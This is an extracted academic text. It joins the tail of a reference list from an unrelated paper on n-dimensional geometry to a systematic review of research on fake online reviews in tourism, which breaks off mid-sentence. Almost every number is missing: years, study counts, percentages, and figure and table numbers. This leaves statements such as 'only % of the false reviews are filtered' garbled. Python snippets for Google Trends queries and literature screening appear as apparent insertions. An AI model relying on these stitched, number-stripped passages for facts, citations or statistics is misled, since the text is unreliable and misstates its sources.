/ http://www.unizar.es/matematicas/algebra/elduque/talks/crossproducts.pdf http://www.unizar.es/matematicas/algebra/elduque/talks/crossproducts.pdf http://dx.doi.org/ . / . . http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. hägerstrand t. . what about people in regional science? papers of the regional science association ( ): – doi . /bf . hamre t, mughal ka, jacob a. . a d marine data model: design and application in ice monitoring. marine geodesy ( – ): – doi . / . hansen hØ, christensen nj. . a model for n-dimensional boundary topology. in: proceedings of the nd acm symposium on solid modelling and applications. new york: acm,. hanson aj. . geometry for n-dimensional graphics. in: heckbert ps, ed. graphics gems iv. san diego: academic press professional, – , chapter . . hanson aj, cross ra. . interactive visualization methods for four dimensions. in: vis’ proceedings of the th conference on visualization’ . new york: acm, – . hanson aj, ishkov ki, ma jh. . meshview: visualizing the fourth dimension. technical report. indiana university. hinton ch. . a new era of thought. london: swan sonnenschein & co. ltd. hollasch sr. . four-space visualization of d objects. master’s thesis, arizona state university. hornsby k, egenhofer mj. . modeling moving objects over multiple granularities. annals of mathematics and artificial intelligence ( – ): – . jones c, abraham i. . design considerations for a scale-independent cartographic database. in: marble d, ed. proceedings of the nd international symposium on spatial data handling. – . kada m. . scale-dependent simplification of d building models based on cell decomposition and primitive instancing. in: cosit . lecture notes in computer science, vol. . berlin, heidelberg: springer-verlag, – . kageyama a. . a visualization method of four dimensional polytopes by oval display of parallel hyperplane slices. available at https://arxiv.org/pdf/ . .pdf. kraak m-j. . the space-time cube revisited from a geovisualization perspective. in: proceedings of the st international cartographic conference, – . lienhardt p. . n-dimensional generalized combinatorial maps and cellular quasi- manifolds. international journal of computational geometry and applications ( ): – doi . /s . luebke d, reddy m, cohen jd, varshney a, watson b, huebner r. . level of detail for d graphics. burlington: morgan kaufmann publishers. massey ws. . cross products of vectors in higher dimensional euclidean spaces. the american mathematical monthly ( ): – doi . / . masuda h. . topological operators and boolean operations for complex-based non- manifold geometric models. computer-aided design ( ): – . mckenzie jw, williamson ip, hazelton n. . -d adaptive gis: justification and methodologies. technical report. department of geomatics, the university of melbourne. arroyo ohori et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /bf http://dx.doi.org/ . / https://arxiv.org/pdf/ . .pdf http://dx.doi.org/ . /s http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. mcmullen c. . the visual guide to extra dimensions: visualizing the fourth dimension, higher-dimensional polytopes, and curved hypersurfaces. scotts valley: createspace independent publishing platform. meijers m. a. the space-scale cube: an integrated model for d polygonal areas and scale. in: fendel em, ledoux h, rumor m, zlatanova s, eds. proceedings of the th urban data management symposium. delft: isprs archives, – vol. 
xxxviii- /c . meijers m. b. variable-scale geo-information, phd thesis, delft university of technology. muller de, preparata fp. . finding the intersection of two convex polyhedra. theoretical computer science ( ): – doi . / - ( ) - . noll am. . a computer technique for displaying n-dimensional hyperobjects. communications of the acm ( ): – doi . / . . noll am. . computer animation and the fourth dimension. in: proceedings of the december - , , fall joint computer conference, part ii. acm, – . paul n. . signed simplicial decomposition and overlay of n-d polytope complexes. available at http://arxiv.org/abs/ . . peucker tk, chrisman nr. . cartographic data strutures. the american cartogra- pher ( ): – doi . / . peuquet dj. . it’s about time: a conceptual framework for the representation of temporal dynamics in geographic information systems. annals of the association of american geographers ( ): – doi . /j. - . .tb .x. peuquet dj, duan n. . an event-based spatiotemporal data model (estdm) for temporal analysis of geographical data. international journal of geographical information science ( ): – doi . / . plümer l, gröger g. . achieving integrity in geographic information systems—maps and nested maps. geoinformatica ( ): – doi . /a: . poincaré m. . analysis situs. journal de l’École polytechnique ( ): – . requicha aag, voelcker hb. . constructive solid geometry. technical memoran- dum . college of engineering & applied science, the university of rochester. riemann b. . ueber die hypothesen, welche der geometrie zu grunde liegen. in: abhandlungen der königlichen gesellschaft der wissenschaften zu göttingen. vol. . göttingen: königlichen gesellschaft der wissenschaften. rigaux p, scholl m. . multi-scale partitions: application to spatial and statistical databases. in: egenhofer mj, herring jr, eds. advances in spatial databases. lecture notes in computer science, vol. . berlin, heidelberg: springer, – . rossignac j, o’connor m. . sgc: a dimension-independent model for pointsets with internal structures and incomplete boundaries. in: wosny m, turner j, preiss k, eds. proceedings of the ifip workshop on cad/cam. – . shreiner d, sellers g, kessenich j, licea-kane b, khronos arb working group. . opengl programming guide: the official guide to learning opengl, version . . th edition. addison-wesley. snyder jp. . map projections—a working manual. reston: us geological survey. arroyo ohori et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . / . http://arxiv.org/abs/ . http://dx.doi.org/ . / http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . / http://dx.doi.org/ . /a: http://dx.doi.org/ . /peerj-cs. sohanpanah c. . extension of a boundary representation technique for the description of n dimensional polytopes. computers & graphics ( ): – doi . / - ( ) - . steeb w-h. . the nonlinear workbook. th edition. singapore: world scientific publishing. van oosterom p. . reactive data structures for geographic information systems. phd thesis, leiden university. van oosterom p. . variable-scale topological data structures suitable for progressive data transfer: the gap-face tree and gap-edge forest. cartography and geographic information science ( ): – doi . / . van oosterom p, meijers m. . vario-scale data structures supporting smooth zoom and progressive transfer of d and d data. international journal of geographical information science : – doi . / . . . van oosterom p, stoter j. . 
submitted april accepted august published september corresponding author jose ramon saura, joseramon.saura@urjc.es academic editor susan herring additional information and declarations can be found on page doi . /peerj-cs. copyright reyes-menendez et al. distributed under creative commons cc-by . open access

the importance of behavioral data to identify online fake reviews for tourism businesses: a systematic review
ana reyes-menendez, jose ramon saura and ferrão filipe department of business economics, rey juan carlos university, madrid, spain vice-rector universidade portucalense, universidade portucalense infante d. henrique, porto, portugal

abstract in the last several decades, electronic word of mouth (ewom) has been widely used by consumers on different digital platforms to gather feedback about products and services from previous customer behavior. however, this useful information is getting blurred by fake reviews—i.e., reviews that were created artificially and are thus not representative of real customer opinions. the present study aims to thoroughly investigate the phenomenon of fake online reviews in the tourism sector on social networking and online reviews sites. to this end, we conducted a systematic review of the literature on fake reviews for tourism businesses. our focus was on previous studies that addressed the following two main topics: (i) tourism (ii) fake reviews. scientific databases were used to collect relevant literature. the search terms "tourism" and "fake reviews" were applied. the database of web of science produced a total of articles and, after the application of different filters following the prisma flow diagram, the process resulted in the selection of studies. our results demonstrate that (i) the analysis of fake reviews is interdisciplinary, ranging from computer science to business and management, (ii) the methods are based on algorithms and sentiment analysis, while other methodologies are rarely used; and (iii) the current and future state of fraudulent detection is based on emotional approaches, semantic analysis and new technologies such as blockchain. this study also provides helpful strategies to counteract the ubiquity of fake reviews for tourism businesses.
subjects human–computer interaction, computer networks and communications, network science and online social networks keywords online reviews, fake reviews, consumer behavior, algorithms, tourism

introduction
in the last four decades, the continuously growing sector of tourism has been supported by the development of information and communication technologies (ict) (papathanassis & buhalis, ; buhalis & law, ). in the st century, the digital revolution in social sciences and tourism should be taken into account, as it is one of the important factors that make the tourism industry competitive (moutinho, ballantyne & rate, ; saura & bennett, ). nowadays, consumers use different social platforms, such as social networking sites (sns), consumer review sites, blogs, and social communities in order to communicate and share their purchase experiences and behavior regarding products and brands with other consumers (cheung & thadani, ; chew, metheney & teague, ; hubert et al., ). the continuously developing technologies and the widespread use of the internet in several industries have empowered the evolution from traditional word-of-mouth to electronic word-of-mouth (ewom) (gottschalk & mafael, ; manes & tchetchik, ). ewom is embodied in online reviews that customers write for other customers. the content of online reviews depends on the experience that these specific customers have with purchased products or services (munar & jacobsen, ; saura, reyes-menendez & alvarez-alonso, a). this fact has an important consequence for businesses, as there is a power shift from companies to consumers (hennig-thurau, walsh & walsh, ; reyes-menendez et al., ). the abovementioned power shift is particularly important in certain industries, such as the tourism industry, where customers pay close attention to the opinions of previous travelers (papathanassis & knolle, ). for that reason, online reviews are a powerful communication tool for tourism businesses. tourism businesses are companies such as hotels, ancillary services, transportation companies and restaurants (riegner, ; reyes-menendez, saura & palos-sánchez, b). with the growth of the internet, the number of online reviews has increased as well, exerting a significant influence on customers' purchase decision making (bennett, yábar & saura, ). the growing relevance of this type of communication is particularly important on social platforms, where it takes the form of online reviews. however, what happens when this information does not represent the objective reality? are companies, rather than real consumers, writing these reviews? in , the federal trade commission (ftc) denounced, for the first time, a company that advertised weight-loss products on amazon for writing false reviews on this platform. in a press interview, the director of the ftc, andrew smith, said that false reviews adversely affect both consumers and companies, as they represent a breach of market norms.
for their part, amazon representatives declared that they would take legal action against those fake reviews and invest significant economic and human resources to ensure that the reviews of the products presented on their platform are true and up-to-date (shu, ). overall, consumers are becoming increasingly aware that many of the reviews on social network sites are fraudulent. to show this trend in numbers, following Önder & gunter ( ), we first made a search with google trends, a tool used previously (Önder & gunter, ) to identify past search trends in google on various topics of interest. the results are shown in figs. and . in fig. , the searches on "fake reviews" made by users on google are shown with a solid line, while searches on "fake news" are shown with a dotted line. as can be seen in fig. , the number of searches on both topics has increased from to . however, the increase is dramatically more pronounced for the searches related to "fake news". the dynamics of the growth in the number of searches on "fake reviews" only is shown in fig. . as can be seen in fig. , the number of searches on "fake reviews" has steadily increased throughout the period – , and this number continues to grow.

figure evolution of searches about fake news and fake reviews. source: google trends ( ).
figure evolution of searches about fake reviews. source: google trends ( ).

in the next step, we checked the importance of the topic of fake reviews for the scientific community. this was done with a search in web of science (wos), a scientific database that indexes scientific articles. similarly to the results obtained with google trends, the wos findings suggest that, throughout – , there has been considerable growth in the number of articles published on the issues of fake news and fake online reviews. furthermore, again consistent with the results of using google trends, the scientific community has been more interested in the topic of fake news, as we found papers that include the term "fake news" in the title, while there were only papers with the term "fake reviews" in the title. figure shows the dynamics in the number of citations to articles addressing fake online reviews throughout the period – . as can be seen in fig. , the first citations appeared in . however, it was not until that scientific interest in fake online reviews skyrocketed, and it continues to grow today. of note, according to the publication terms of the journals included in the jcr (journal citation report) index, to which web of science (wos) belongs, the publications that appeared in will begin to be cited in the next months or years. this explains why the publications from do not follow the growth trend as compared to the previous years.

figure number of citations to articles by year. source: google trends ( ).

the results shown in figs. – underscore the importance of the topic of fake online reviews for consumers, companies, and the scientific community.
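as an aside for readers who want to reproduce this kind of trend comparison, the short sketch below shows one way to query google trends programmatically. it uses the third-party pytrends package rather than the google trends website used in the study, and the search terms and timeframe shown are illustrative assumptions, not the exact settings of the original analysis.

```python
# A minimal sketch of a Google Trends comparison, assuming the third-party
# pytrends package (an unofficial Google Trends client) is installed.
from pytrends.request import TrendReq

pytrends = TrendReq(hl="en-US", tz=0)
# Terms and timeframe are illustrative assumptions, not the study's own settings.
pytrends.build_payload(["fake reviews", "fake news"], timeframe="2004-01-01 2019-06-30")

# interest_over_time() returns a pandas DataFrame with one column per term
# (relative search interest, 0-100) plus an 'isPartial' flag.
interest = pytrends.interest_over_time().drop(columns=["isPartial"])

# Yearly means make the diverging growth of the two terms easy to compare.
print(interest.resample("Y").mean().round(1))
```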
accordingly, in the present paper, our major goal is to identify directions of current research to address the problem of fake reviews on tourism platforms. the remainder of this paper is structured as follows. after a brief literature review in 'literature review', we present the methodology used in the present study in 'methodology'. results are reported in 'exploratory analysis of results'. the paper concludes with a discussion of the implications of our findings ('implications') and general conclusions ('conclusions').

literature review
over the last years, many studies have investigated the impact of online reviews on consumer purchase behavior and decision making (chevalier & mayzlin, ; riegner, ; gretzel & yoo, ). a strong influence of online reviews has also been highlighted in numerous industry statistics reports (e.g., reyes-menendez et al., ). electronic word-of-mouth has become an important concept for tourism businesses (papathanassis & knolle, ). according to litvin, goldsmith & pan ( ) and pai et al. ( ), ewom is the most important source of information that drives consumer purchase behavior in the hospitality and tourism services sectors. in the last several decades, advances in information and communication technologies (icts) have transformed both travelers' behavior and the tourism industry (buhalis & law, ). nowadays, the number of travelers who access the internet to book hotel rooms via third-party intermediaries is continuously increasing (luo, chen & zheng, ). furthermore, several studies demonstrated that about two-thirds of customers prefer to read online consumer reviews about a hotel rather than rely on the hotel's own descriptions. such online reviews are visited by hundreds of millions of potential hotel visitors every year (reyes-menendez, saura & martinez-navalon, ). therefore, in order to obtain a better understanding of the continuously increasing impact of ewom on different social platforms and its effect on the decision making and behavior of hotel consumers, reviews on online travel sites and social networking sites should be taken into account (saura, rodriguez herráez & reyes-menendez, ). yet, a recently emerging issue with online reviews is that some of them are fake. although most online platforms have their own false review detection algorithms (cheng, tseng & chung, ), these algorithms are sometimes limited in scope and filter only % of published fake reviews (luca & zervas, ). therefore, there is a clear need to improve the existing algorithms and elaborate new approaches. many studies have sought to do just that (e.g., elmurngi & gherbi, ; munzel, ; zhang et al., ). to this end, various methodologies have been used, some of which will be discussed in the remainder of this paper.

methodology
following kazakov & predvoditeleva ( ), in the present study we aimed to provide an overview of previous research on the state of the art of online fake reviews on tourism social networking sites. we focused on the analysis of users' ability to detect real or fake reviews. to this end, we critically examined the available literature on tourism fake reviews and behavioral approaches to analyze and identify them for tourism businesses. the systematic literature review focused on the following two main topics: (i) fake reviews; (ii) tourism. following sherman et al.
( ) and banerjee, chua & kim ( ), we used a randomized controlled process to select the main topics and the consequent search terms "fake reviews" and "tourism". the scientific databases scopus, pubmed, psycinfo, sciencedirect, and web of science were used to collect relevant studies on the issue at stake. of note, when performing the search by "title" in the scientific database web of science, only one article met the aforementioned search requirement that both "fake reviews" and "tourism" were contained in the title. therefore, following saura, palos-sánchez & suárez ( ), we included the articles that were initially obtained as a result of the search, prioritizing those that dealt with reviews, even if they were not specifically focused on tourism platforms. we reasoned that the insights reported in these studies could be extended to address the problem of false reviews on tourism platforms. the search yielded a total of articles; after different filters were applied (see fig. ), a total of studies were selected for further analysis. the boolean operator 'and' was applied to optimize the results. all articles were analyzed by reading the titles and abstracts and selecting the ones which met the inclusion criteria. next, we analyzed the selected papers. the data were collected in june using amstar ( ), a tool initially designed to assess the quality of articles based on their abstracts (shea et al., ). in this way, we ensured that only high-quality studies were included in the dataset. in the process of article selection, we also followed the recommendations formulated by van den bosch & ode sang ( ). these recommendations include keyword search in several databases, predefined inclusion criteria, and data extraction based on selected keywords. to this end, following saura, palos-sánchez & suárez ( ), we used the preferred reporting items for systematic reviews and meta-analyses (prisma) flow diagram. this method, introduced by moher et al. ( ), provides guidelines to develop systematic reviews and meta-analyses that include conceptual and practical advances in the science of systematic reviews. one of the phases of the prisma flow diagram is discarding the articles that have inadequate or inconclusive terms. the terms considered inadequate or inconclusive are those that a priori may correspond to the keywords; however, when reading the article in depth, it is observed that they are not within the scope of the investigation. these terms can be misleading, as in the case of "reviews", which may refer either to tourist reviews or to peer reviews. our aim was to achieve the highest possible amount of evidence in the results based on high-quality studies. some of the variables used in amstar to evaluate the quality of the systematic review were (i) the relationship of the research question to the criteria included in the study; (ii) the extraction of data from at least two independent researchers; (iii) the quality of the literature review; (iv) identification and definition of concepts; and (v) the quality of the conclusions stated in the study.

figure prisma flow diagram.
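the title-and-abstract screening step described above can be made concrete with a small sketch. the record structure, the broadened tourism vocabulary, and the sample entries below are hypothetical illustrations of the kind of inclusion criteria discussed here, not the authors' actual selection code.

```python
from dataclasses import dataclass

@dataclass
class Record:
    title: str
    abstract: str
    source: str  # e.g. "Web of Science" or "Scopus"

def meets_inclusion_criteria(rec: Record) -> bool:
    """Screen a record on title and abstract: both topics must appear
    (the boolean 'and' of the two search terms). Ambiguous uses of
    'reviews' (tourist reviews vs. peer reviews) are resolved later,
    at the full-text reading stage."""
    text = f"{rec.title} {rec.abstract}".lower()
    mentions_fake_reviews = "fake review" in text
    # Broadened tourism vocabulary is an assumption made for illustration.
    mentions_tourism = any(term in text for term in ("tourism", "hotel", "travel"))
    return mentions_fake_reviews and mentions_tourism

def screen(records):
    """Deduplicate by normalized title, then keep records passing the criteria."""
    seen, included = set(), []
    for rec in records:
        key = rec.title.strip().lower()
        if key in seen:
            continue
        seen.add(key)
        if meets_inclusion_criteria(rec):
            included.append(rec)
    return included

if __name__ == "__main__":
    sample = [
        Record("Detecting fake reviews on hotel platforms", "A study of review fraud.", "Web of Science"),
        Record("Peer review practices in biology journals", "Editorial survey.", "Scopus"),
    ]
    print([r.title for r in screen(sample)])  # only the first record is kept
```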
exploratory analysis of results the systematic literature review (rsl) was proposed by saura, palos-sánchez & suárez ( ) and bassett ( ) as a development tool to carry out an exploratory analysis of previously reported results. such a literature review is used to evaluate researchers’ interest in a specific topic (saura, reyes-menendez & palos-sanchez, b). a literature review is an exploratory methodology and consists of collecting and re-analyzing available findings. a literature review usually includes both primary and secondary sources. luo & zhong ( ) and comerio & strozzi ( ) conducted literature reviews and applied exploratory analysis specifically for tourism businesses, while huete-alcocer ( ) focused on the transformation of the traditional word-of-mouth into electronic word-of- mouth, and the behavioral implications of this transition for the tourism industry. a summary of the studies selected for further analysis in the present review is shown in table . table presents the authors of relevant studies, as well as the main contents of those studies. based on this information, we categorized the reviewed studies in several groups. for instance, the studies that can be applied to all sectors were categorized as ‘‘all industries’’. a study classified into the category of ‘‘e-commerce’’ was included in the analysis since, for example, tripadvisor is considered an e-commerce platform in the tourism sector. studies on restaurants were categorized into the ‘‘restaurant—hospitality industry’’ group. finally, articles on hotels and other tourist services were grouped into the ‘‘tourism’’ category. the studies summarized in table demonstrate the growing interest in the concept of fake reviews and social networking sites, particularly in the hospitality and tourism industries. some of these studies (e.g., banerjee & chua, ; banerjee et al., ; cardoso, silva & almeida, ; chang et al., ; deng & chen, ; hunt, ; lappas, sabnis & valkanas, a; lappas, sabnis & valkanas, b; li, feng & zhang, ; munzel, ) focus on the tourism industry category, while others fall into the hospitality industry category (chen, guo & deng, ; li et al., ; li et al., ; luca & zervas, ). some works (lin et al., ; zhang et al., ; ramalingam & chinnaiah, ) were included as part of the analysis because their results can be implemented in every industry that allows consumers to write reviews, including the tourism industry. elmurngi & gherbi ( ) analyzed false reviews in e-commerce, considering that tripadvisor is the most important e-commerce platform in the hospitality industry; therefore, this study might be of interest to the present study (reyes-menendez, saura & alvarez-alonso, a). the interest in the concept of fake reviews is underpinned by two factors. first, as demonstrated in several studies, the currently available algorithms of false review detection remain largely ineffective. for instance, luca & zervas’ ( ) results demonstrate that only % of the false reviews are filtered on the yelp platform—particularly, those that have more extreme content, either positive or negative; this suggests that the remaining % of reviews are not filtered and may be false. second, as demonstrated in several studies, false reviews negatively impact companies’ visibility. for instance, lappas, sabnis & valkanas ( a) and lappas, sabnis & valkanas ( b) report that, with only false reviews in some markets, competitors can be overtaken in terms of visibility. in this sense, reyes-menendez et al. ( ), peerj comput. sci., doi . /peerj-cs. 
/ https://peerj.com http://dx.doi.org/ . /peerj-cs. table previous studies on fake online reviews in the tourism industry. authors study description study industry banerjee & chua ( ) this study proposes several algorithms of identification of false reviews. attention is paid to linguistic aspects of comprehension, level of detail, writing form, and cognitive indicators tourism banerjee et al. ( ) this study investigates false reviews published on tripadvisor. after completing a survey, users are invited to write fake hotel reviews tourism cardoso, silva & almeida ( ) this paper is an exhaustive review of the content analysis methods of false review detection. to this end, the authors develop experiments based on hotels tourism chang et al. ( ) in this study, a rumor model is used to detect false reviews on the tripadvisor platform based on the following three characteristics of the content: important attribute words, quantifiers, and the ratio of names and verbs. the proposed model reduces the possibility of obtaining false reviews tourism deng & chen ( ) this study focuses on the development of an algorithm, based on sentiment analysis, to identify false reviews of restaurants. the results demonstrate that the proposed algorithm has the predictive capacity of over % tourism hunt ( ) this study focuses on the legal aspect of fake reviews and argues for the adoption of specific laws to prohibit the publication of false reviews tourism lappas, sabnis & valkanas ( a) and lappas, sabnis & valkanas ( b) the analysis is based on over . million comments from , hotels in cities to understand the impact of false reviews on the visibility of establishments. the results suggest that, with only false reviews in some markets, competitors can be overtaken in terms of visibility tourism li, feng & zhang ( ) based on the density of the reviews, as well as their semantic aspects and emotional aspects, this study creates an algorithm for false review detection based on review content applicable to the tourism industry tourism munzel ( ) this study analyzes published reviews and rejected reviews taking into account the information about the author, age, and stars the user has been given in recently published reviews. the results emphasize the importance of the previous history of users who publish reviews for false review detection tourism chen, guo & deng ( ) this study proposes an algorithm based on sentiment analysis to identify false reviews in restaurants. the results demonstrate that the proposed algorithm has the predictive capacity of % restaurants - hospitality industry li et al. ( ) this study focuses on the dianping, china’s largest restaurant review platform, and analyzes the dependencies among reviews, users, and ip addresses using an algorithm called multi-typed heterogeneous collective classification (mhcc), and then extends it to collective positive and unlabeled learning (cpu) restaurants - hospitality industry (continued on next page) reyes-menendez et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table (continued) authors study description study industry li et al. ( ) in this study, the louvain community detection method is used to study online communities. the results suggest that false reviews predominate in profiles with low scores, and that the more followers a community has, the greater the number of false reviews restaurants - hospitality industry luca & zervas ( ) this study analyzes the reviews published on the yelp site. 
the results demonstrate that only % of the reviews are filtered (those that more extreme, either positively or negatively). the restaurants that usually publish false reviews are those with fewer comments or negative comments. restaurant chains usually publish fewer false reviews. finally, more competitive restaurants are more likely to get false reviews restaurants - hospitality industry elmurngi & gherbi ( ) in this study, textual classification and sentiment analysis are used to identify false reviews in e-commerce. four rating sentiment classification algorithms are compared: naïve bayes (nb), support vector machine (svm), k-nearest neighbors (knn-ibk), and decision tree (dt-j ). the results show that algorithms can effectively predict false reviews e-commerce lin et al. ( ) this study proposes a new approach to identifying false reviews that is based on the content of the reviews and the behavior of the users. the results show that the proposed approach is more precise and accurate than current algorithms all industries ramalingam & chinnaiah ( ) this study reviews the latest algorithms of false profile detection in social networks all industries zhang et al. ( ) this study analyzes non-verbal characteristics of users who write false reviews to create a predictive algorithm of detection of false reviews. the algorithm can complement the traditional method of detection of false reviews all industries hunt ( ) focuses on the example of the uk advertising standards authority that found against the tourism social platform tripadvisor. these figures explain the concern of establishments in the tourism sector about the phenomenon of false reviews. in what follows, we review the methodologies used in previous research on false reviews in the tourism industry. particular attention is paid to the unit of analysis focused on in previous studies and the behavioral approach to the analysis and identification of online fake reviews in tourism. methodologies used in previous research first, most studies in the present systematic review of the literature focus on analysis of the algorithms of false review detection and their improvement. in these studies, large amounts of data from social communities such as tripadvisor or yelp are typically used (chang et al., ; li et al., ). the second most used methodology is sentiment analysis, focusing on the emotional aspects and feelings expressed in written reviews. in this methodology, comments are classified as positive, negative or neutral according to the words contained in them (chen, guo & deng, ; deng & chen, ; elmurngi & gherbi, ). the reyes-menendez et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table classification of previous studies according to their methodology. authors algorithms sentiment analysis other methodologies banerjee & chua ( ) √ banerjee et al. ( ) √ cardoso, silva & almeida ( ) √ chang et al. ( ) √ li et al. ( ) √ li, feng & zhang ( ) √ li et al. ( ) √ luca & zervas ( ) √ lappas, sabnis & valkanas ( a) and lappas, sabnis & valkanas ( b) √ chen, guo & deng ( ) √ deng & chen ( ) √ elmurngi & gherbi ( ) √ lin et al. ( ) √ zhang et al. 
( ) √ hunt ( ) √ munzel ( ) √ ramalingam & chinnaiah ( ) √ third direction of research comprises other methodologies that aim to either discover new knowledge to be implemented in false review detection for tourism businesses (hunt, ) or perform the analysis of legal aspects and measures that countries like the united kingdom or australia take to counteract false reviews (ramalingam & chinnaiah, ). table provides a classification of the studies reviewed in the present study into the aforementioned three groups. unit of analysis the studies reviewed in this paper approach the phenomenon of false reviews differently. for some studies (li et al., ; lin et al., ; ramalingam & chinnaiah, ) the major units of analysis are profiles of users who write reviews. these studies seek patterns that would help better identify profiles that are more likely to generate false reviews. for other studies, the major unit of analysis is the content of online reviews. here, the studies tend to focus on two types of content. on the one hand, some studies focus on the textual content of reviews, i.e., on their linguistic aspects, such as the ratio of nouns to verbs, the type of words or the attributes used to write false reviews (banerjee et al., ; cardoso, silva & almeida, ; chang et al., ; chen, guo & deng, ; deng & chen, ; elmurngi & gherbi, ; lappas, sabnis & valkanas, a; lappas, sabnis & valkanas, b). on the other hand, there are studies that prioritize detecting behavioral and emotional characteristics of users who write false reviews (banerjee & chua, ; li, feng & zhang, ; li et al., ; luca & zervas, ; zhang et al., ). munzel ( ) focuses the research on both the textual and the behavioral aspects. at the same time, hunt ( ) does a review of the legal aspects that concern fake reviews, such that the unit of reyes-menendez et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table classification of previous studies according to their unit of analysis. authors user profile content textual behavioral li et al. ( ) √ – – lin et al. ( ) √ – – ramalingam & chinnaiah ( ) √ – – banerjee et al. ( ) – √ – cardoso, silva & almeida ( ) – √ – chang et al. ( ) – √ – chen, guo & deng ( ) – √ – deng & chen ( ) – √ – elmurngi & gherbi ( ) – √ – lappas, sabnis & valkanas ( a) and lappas, sabnis & valkanas ( b) – √ – munzel ( ) – √ √ banerjee & chua ( ) – – √ li, feng & zhang ( ) – – √ li et al. ( ) – – √ luca & zervas ( ) – – √ zhang et al. ( ) – – √ hunt ( ) – – – analysis is neither user profile nor content. in table , the reviewed studies are classified into the aforementioned three groups. scientometric analysis in the next step, in order to gain a better understanding of which areas of research focused more on false reviews, scientometric analysis was performed. here, we followed a previous study by saura, palos-sánchez & suárez ( ). a scientometric analysis is the quantitative and qualitative analysis of science and scientific outcomes. this concept was first created by price ( ) and has been widely used as a complementary analysis of systematic literature reviews (saura, palos-sánchez & suárez, ) or as the major topic of the study (kullenberg & kasperowski, ). in their work, kollwitz & papathanassis ( ) highlighted the importance of using qualitative methods, such as delphi techniques for the tourism industry, and walle ( ) supported using a combination of qualitative with quantitative analysis in the tourism sector. 
in table , the results of both qualitative and quantitative analysis are summarized with respect to the author, journal indexed in jcr ranking and its category and quartile. the author field is included to trace the analysis conducted by the authors throughout the article. the quartile and category reflect all the categories that the journal has according to its web of science classification and, in case the quartile was different for different categories, that is also reflected in the table. the discipline with the highest number of publications was computer science as can be seen in table . there are a total of publications that belong to the category reyes-menendez et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table scientometric classification. author journal quartile category banerjee & chua ( ) th international conference on digital information management (icdim) – computer science, information systems; computer science, theory & methods; engineering, electrical & electronic banerjee et al. ( ) th international conference on ubiquitous information management and communication (acm imcom) – computer science, theory & methods cardoso, silva & almeida ( ) neurocomputing q computer science; artificial intelligence chang et al. ( ) lecture notes in computer science q computer science, theory & methods chen, guo & deng ( ) lecture notes in computer science q computer science deng & chen ( ) lecture notes in computer science q computer science, theory & methods elmurngi & gherbi ( ) th international conference on innovative computing technology (intech) – computer science, hardware & architecture; computer science, software engineering; computer science, theory & methods hunt ( ) computer law and security review q law lappas, sabnis & valkanas ( a) and lappas, sabnis & valkanas ( b) information systems research q management information science & library science li, feng & zhang ( ) rd international conference on information science and control engineering (icisce) – automation & control systems, computer science, theory & methods li et al. ( ) ieee international conference on data mining (icdm) – computer science, artificial intelligence; computer science, information systems li et al. ( ) china communications q telecommunications lin et al. ( ) proceedings of the ieee/acm international conference on advances in social networks analysis and mining (asonam ) – computer science, information systems; computer science, theory & methods luca & zervas ( ) management science q management operations research & management science munzel ( ) journal of retailing and customer services q business ramalingam & chinnaiah ( ) computers and electronical engineering q computer science; engineering, electrical & electronic q computer science, interdisciplinary zhang et al. ( ) journal of management information systems q management computer science, information systems q information science & library science r eyes-m enendez etal. ( ),p eerj c om put. s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. of computer science and six that fall into the category of computer science theory & methods. the next category is information systems which has four publications. other disciplines include management (three publications), and operations research, management science, and business (one publication each). 
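the kind of tally behind this scientometric breakdown is straightforward to reproduce. the sketch below counts publications per web of science category and per jcr quartile from a small, entirely made-up set of records; the entries are placeholders for illustration, not the actual studies or their quartiles.

```python
from collections import Counter

# Hypothetical records: (study id, WoS categories, JCR quartile or None for proceedings).
studies = [
    ("study a", ["computer science, information systems"], "q2"),
    ("study b", ["computer science, artificial intelligence"], "q1"),
    ("study c", ["management", "information science & library science"], "q1"),
    ("study d", ["computer science, theory & methods"], None),  # conference proceedings
]

# One study can contribute to several categories, so flatten before counting.
category_counts = Counter(cat for _, cats, _ in studies for cat in cats)
# Proceedings (quartile None) are excluded from the quartile tally.
quartile_counts = Counter(q for _, _, q in studies if q is not None)

print("publications per category:", category_counts.most_common())
print("publications per quartile:", dict(quartile_counts))
```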
this indicates that fake reviews are of interest to both computer scientists who develop the algorithms of false review detection and the management of companies and businesses that is willing to improve the detection of fake reviews that undermine the credibility of these platforms. all reviewed studies come from the disciplines of artificial intelligence, automation & control systems, business, computer science, computer science theory & methods, engineering electrical & electronic, hardware & architecture, information systems, information science & library science, interdisciplinary, software engineering, law, management, operations research & management science and finally, telecommunications. all journals have only published one paper, except for the journal lecture notes in computer science that published three articles (chen, guo & deng, ; deng & chen, ; chang et al., ). it is also interesting to note that six of the papers that were listed in the database of the web of science and for which we could extract the category were published as conference proceedings; therefore, their quartile could not be analyzed. regarding the quartile of the remaining papers, we took the highest rated category in the case when there was more than one category with different quartiles. therefore, three of them were q , four were q , and three were q . implications implications for managers the results of the present study underscore the importance of online reviews for the tourism industry not only on major websites (papathanassis, ), but also on other type of platforms that require managerial attention for proper brand management (saura, palos-sanchez & reyes-menendez, ). nowadays, online review sites and social media websites have become an important source of information for consumers and exert a strong influence on consumer purchase behavior and decision making (gretzel et al., ; kim, kandampully & bilgihan, ; manes & tchetchik, ; reyes-menendez et al., ). therefore, efficient collection and analysis of fake online reviews can help companies to remain competitive in this industry (hennig-thurau, walsh & walsh, ; hu et al., ; lin et al., ; zhang et al., ). the ubiquitous presence of fake online reviews on review and social networking sites creates an asymmetry in the information that consumers get about a company. however, when managers track customer comments, the information asymmetry is reduced (manes & tchetchik, ). the growth in the number of fake reviews in the tourism industry and the influence of these references on customer behavior and decision making has driven numerous managers to explore the phenomenon of fake reviews and consider the application of new online content strategies (li, feng & 